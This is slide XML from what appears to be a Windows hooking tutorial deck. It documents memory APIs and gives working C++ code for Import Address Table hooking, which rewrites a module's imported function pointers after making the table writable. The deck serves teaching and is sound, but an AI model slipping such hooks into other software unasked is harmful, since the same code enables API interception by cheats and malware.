              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>HMODULE GetModuleHandleA(</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  [in, optional] LPCSTR lpModuleName</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6157595" y="1319530"/>
            <a:ext cx="5882640" cy="2109470"/>
            <a:chOff x="9697" y="2486"/>
            <a:chExt cx="9264" cy="3322"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9697" y="2486"/>
              <a:ext cx="9265" cy="3323"/>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9906" y="2719"/>
              <a:ext cx="8847" cy="2858"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
                <a:buSzPct val="150000"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Retrieves a module handle for the specified module. The module must have been loaded by the calling process.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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MEMORY_BASIC_INFORMATION</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6231890" y="2952750"/>
            <a:ext cx="5810885" cy="3211830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="10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BaseAddress</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A pointer to the base address of the region of pages.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="10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AllocationBase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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A pointer to the base address of a range of pages allocated by the VirtualAlloc function.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="10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RegionSize</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 size of the region beginning at the base address in which all pages have identical attributes, in bytes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="197485" y="1170940"/>
            <a:ext cx="5898515" cy="4831080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef struct _MEMORY_BASIC_INFORMATION {</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PVOID  BaseAddress;</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PVOID  AllocationBase;</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DWORD  AllocationProtect;</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WORD   PartitionId;</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SIZE_T RegionSize;</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DWORD  State;</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DWORD  Protect;</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DWORD  Type;</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MEMORY_BASIC_INFORMATION, *PMEMORY_BASIC_INFORMATION;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6309995" y="1170940"/>
            <a:ext cx="5744845" cy="1576070"/>
            <a:chOff x="10385" y="2770"/>
            <a:chExt cx="9047" cy="2482"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10385" y="2770"/>
              <a:ext cx="9047" cy="2482"/>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10502" y="2957"/>
              <a:ext cx="8813" cy="2107"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
                <a:buSzPct val="150000"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2700">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Contains information about a range of pages in the virtual address space of a process. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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VirtualQuery</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95885" y="4112260"/>
            <a:ext cx="12000865" cy="2163445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>[in, optional] lpAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">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A pointer to the base address of the region of pages to be queried.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>[out] lpBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>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A pointer to a MEMORY_BASIC_INFORMATION structure in which information about the specified page range is returned.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>[in] dwLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>The size of the buffer pointed to by the lpBuffer parameter, in bytes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267970" y="1373188"/>
            <a:ext cx="7151370" cy="2460625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>SIZE_T VirtualQuery(</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>  [in, optional] LPCVOID                   lpAddress,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>  [out]          PMEMORY_BASIC_INFORMATION lpBuffer,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>  [in]           SIZE_T                    dwLength</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>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p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7533005" y="1400810"/>
            <a:ext cx="4563110" cy="2405380"/>
            <a:chOff x="11863" y="1812"/>
            <a:chExt cx="7186" cy="3788"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11863" y="1812"/>
              <a:ext cx="7187" cy="3788"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 6325"/>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11863" y="1938"/>
              <a:ext cx="7187" cy="3536"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
                <a:buSzPct val="150000"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Retrieves information about a range of pages in the virtual address space of the calling process.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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Hook-Indirect</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 name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6393815"/>
            <a:ext cx="12364085" cy="61023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Text Box 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="165418" y="1031240"/>
            <a:ext cx="11861165" cy="11091545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/**</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 Function to hook functions in the IAT of a specified module.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 \param lpModuleName : name of the module wich contains the function you want to hook.</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 \param lpFunctionName : name of the function you want to hook.</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 \param lpFunction : pointer of the new function.</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 \param lpTargetModuleName : name of the module you want to target.</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 \return : the pointer of the original function or nullptr if it failed.</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LPVOID IAT::Hook(LPCSTR lpModuleName, LPCSTR lpFunctionName, const LPVOID lpFunction, LPCSTR lpTargetModuleName)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//Retrieves a module handle for the specified module. The module must have been loaded by the calling process.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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const HANDLE hModule = GetModuleHandleA(lpTargetModuleName); </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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const auto lpImageDOSHeader = (PIMAGE_DOS_HEADER)(hModule);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if (lpImageDOSHeader == nullptr)</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return nullptr;</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const auto lpImageNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)lpImageDOSHeader + lpImageDOSHeader-&gt;e_lfanew);//heading to NT header</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const IMAGE_DATA_DIRECTORY ImportDataDirectory = lpImageNtHeader-&gt;OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];//Go to the IMPORT Directory </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auto lpImageImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((DWORD_PTR)hModule + ImportDataDirectory.VirtualAddress);//obtain the virtual address of Import table </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while (lpImageImportDescriptor-&gt;Characteristics != 0) //check if there are imported </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dlls</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const auto lpCurrentModuleName = (LPSTR)((DWORD_PTR)lpImageDOSHeader + lpImageImportDescriptor-&gt;Name); //dll name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if (strcmp(lpCurrentModuleName, lpModuleName) != 0) //check if the lpModuleName (source dll) used by the target lpTargetModuleName (target dll).</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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lpImageImportDescriptor++;  //go to next imported dll</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continue;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auto lpImageOrgThunkData = (PIMAGE_THUNK_DATA)((DWORD_PTR)lpImageDOSHeader + lpImageImportDescriptor-&gt;OriginalFirstThunk);</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auto lpImageThunkData = (PIMAGE_THUNK_DATA)((DWORD_PTR)lpImageDOSHeader + lpImageImportDescriptor-&gt;FirstThunk);</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while (lpImageOrgThunkData-&gt;u1.AddressOfData != 0)//looking for the hooked function name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const auto lpImportData = (PIMAGE_IMPORT_BY_NAME)((DWORD_PTR)lpImageDOSHeader + lpImageOrgThunkData-&gt;u1.AddressOfData);</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if (strcmp(lpFunctionName, lpImportData-&gt;Name) == 0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//if found</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DWORD dwJunk = 0;</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MEMORY_BASIC_INFORMATION mbi;</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//Retrieves information about a range of pages in the virtual address space of the calling process.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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VirtualQuery(lpImageThunkData, &amp;mbi, sizeof(MEMORY_BASIC_INFORMATION));</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if (!VirtualProtect(mbi.BaseAddress, mbi.RegionSize, PAGE_READWRITE, &amp;mbi.Protect))</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//change the memory for the function to be writtable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return nullptr;</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const auto lpOrgFunction = (LPVOID)lpImageThunkData-&gt;u1.Function;</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#if defined _M_IX86</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lpImageThunkData-&gt;u1.Function = (DWORD_PTR)lpFunction; //replace the function with ours</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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#elif defined _M_X64</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lpImageThunkData-&gt;u1.Function = (DWORD_PTR)lpFunction;</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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#endif</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if (VirtualProtect(mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &amp;dwJunk))</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//successful</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return lpOrgFunction;</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lpImageThunkData++;</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lpImageOrgThunkData++;</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lpImageImportDescriptor++;</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return nullptr;</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a:t>
            </a:r>
            <a:endParaRPr sz="140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5 0.0272222 L 0.00505208 -0.808796 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-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GetCurrentProcessModule</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 name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6393815"/>
            <a:ext cx="12364085" cy="61023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Text Box 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="165418" y="1031240"/>
            <a:ext cx="11861165" cy="5365115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>LPVOID IAT::GetCurrentProcessModule()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char lpCurrentModuleName[MAX_PATH];</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char lpImageName[MAX_PATH];</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GetProcessImageFileNameA(GetCurrentProcess(), lpImageName, MAX_PATH);</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MODULEENTRY32 ModuleList{};</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ModuleList.dwSize = sizeof(ModuleList);</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const HANDLE hProcList = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, 0);</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if (hProcList == INVALID_HANDLE_VALUE)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return nullptr;</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if (!Module32First(hProcList, &amp;ModuleList))</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return nullptr;</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wcstombs_s(nullptr, lpCurrentModuleName, ModuleList.szModule, MAX_PATH);</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lpCurrentModuleName[MAX_PATH - 1] = '\0';</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if (StrStrIA(lpImageName, lpCurrentModuleName) != nullptr)</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return ModuleList.hModule;</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while (Module32Next(hProcList, &amp;ModuleList))</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wcstombs_s(nullptr, lpCurrentModuleName, ModuleList.szModule, MAX_PATH);</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lpCurrentModuleName[MAX_PATH - 1] = '\0';</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if (StrStrIA(lpImageName, lpCurrentModuleName) != nullptr)</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return ModuleList.hModule;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return nullptr;</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a:t>
            </a:r>
            <a:endParaRPr sz="140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5 0.0272222 L 0.00505208 -0.808796 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-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Hook-Direct</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 name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
